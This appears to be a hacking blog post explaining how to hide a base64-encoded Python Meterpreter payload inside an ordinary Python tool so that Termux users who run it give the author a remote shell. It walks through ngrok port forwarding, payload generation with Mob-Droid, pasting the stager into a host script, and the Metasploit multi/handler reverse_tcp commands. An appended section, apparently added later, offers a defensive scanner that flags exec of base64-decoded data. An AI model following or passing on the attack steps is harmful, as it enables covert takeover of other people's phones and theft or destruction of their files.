Hey guys, I'm back with another exciting Android hacking post. Today I'm going to show you how easy it is to gain access to a Termux user's Android device. You can access and write data in storage, remove and edit files, and run a shell on the target device remotely, and the amazing thing is that you don't need to install any APK file on the target Android device. So let's get started.
Basically, we need to make a base64-encoded Python payload and bind or hide it in another Python file or Python tool. Follow the steps carefully and try to understand what we are doing so you don't run into any errors.
Step 1. Do Port Forwarding
- We can use ngrok for temporary port forwarding
- Visit this post to configure and do port forwarding with ngrok
Step 2. Make Python Payload
- We use the Mob-Droid tool to make the Python payload
- Check this post for Mob-Droid Setup and Usage
Step 3. Hide Python Payload In File
- Once you have successfully made the Python payload, open it in any text editor and copy the whole code of the file.
- Open the main file in which you want to hide the payload in a text editor
- Paste the code at the start of the main file's code and save it
Step 4. Exploit Payload With Metasploit
- Start the Metasploit console using " $ msfconsole "
- Start multi handler " $ use multi/handler "
- Set payload " $ set payload python/meterpreter/reverse_tcp "
- Set local host " $ set lhost (Enter local host) "
- Set local port " $ set lport (Enter local port) "
- Now run the exploit " $ exploit "
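Seen from the receiving side, Step 3 leaves a base64 blob being decoded and executed at the top of an otherwise ordinary script. The added example below (not from the original post) parses a Python file without running it and reports every exec/eval fed by a base64 decode; the function names and sample strings are constructed for illustration, and it assumes the stager takes that exec-around-decode form.

```python
import ast
import base64
import binascii
import sys

EXEC_NAMES = {"exec", "eval"}
DECODERS = {"b64decode", "urlsafe_b64decode", "decodebytes"}

def _call_name(node):
    """Bare name of the callee: 'exec' for exec(...), 'b64decode' for x.b64decode(...)."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    return func.attr if isinstance(func, ast.Attribute) else None

def find_encoded_exec(source):
    """Return [(line, decoded_preview)] for each exec/eval whose argument is base64-decoded."""
    findings = []
    for node in ast.walk(ast.parse(source)):  # parse only, never execute
        if not (isinstance(node, ast.Call) and _call_name(node) in EXEC_NAMES):
            continue
        inner = [n for n in ast.walk(node) if n is not node]
        if not any(isinstance(n, ast.Call) and _call_name(n) in DECODERS for n in inner):
            continue
        preview = ""
        for n in inner:  # decode the embedded literal so a reviewer can read it
            if isinstance(n, ast.Constant) and isinstance(n.value, (str, bytes)) and len(n.value) >= 16:
                try:
                    preview = base64.b64decode(n.value, validate=True)[:60].decode("utf-8", "replace")
                    break
                except (binascii.Error, ValueError):
                    continue
        findings.append((node.lineno, preview))
    return findings

# Constructed samples: a harmless print() stands in for the encoded stager.
_blob = base64.b64encode(b"print('constructed stand-in for a stager')").decode()
SAMPLE = (f"exec(__import__('base64').b64decode('{_blob}'))\n"
          "def main():\n    print('the tool the user expected')\n")
CLEAN = "import base64\nprint(base64.b64decode('aGk='))\n"

if __name__ == "__main__":
    for path in sys.argv[1:] or [None]:
        text = SAMPLE if path is None else open(path, encoding="utf-8").read()
        for line, preview in find_encoded_exec(text):
            print(f"{path or '<constructed sample>'}:{line}: exec of base64 data -> {preview!r}")
```

Pass the paths of downloaded scripts as arguments before running them in Termux. An empty result only means this one pattern is absent; code hidden by other means is not detected.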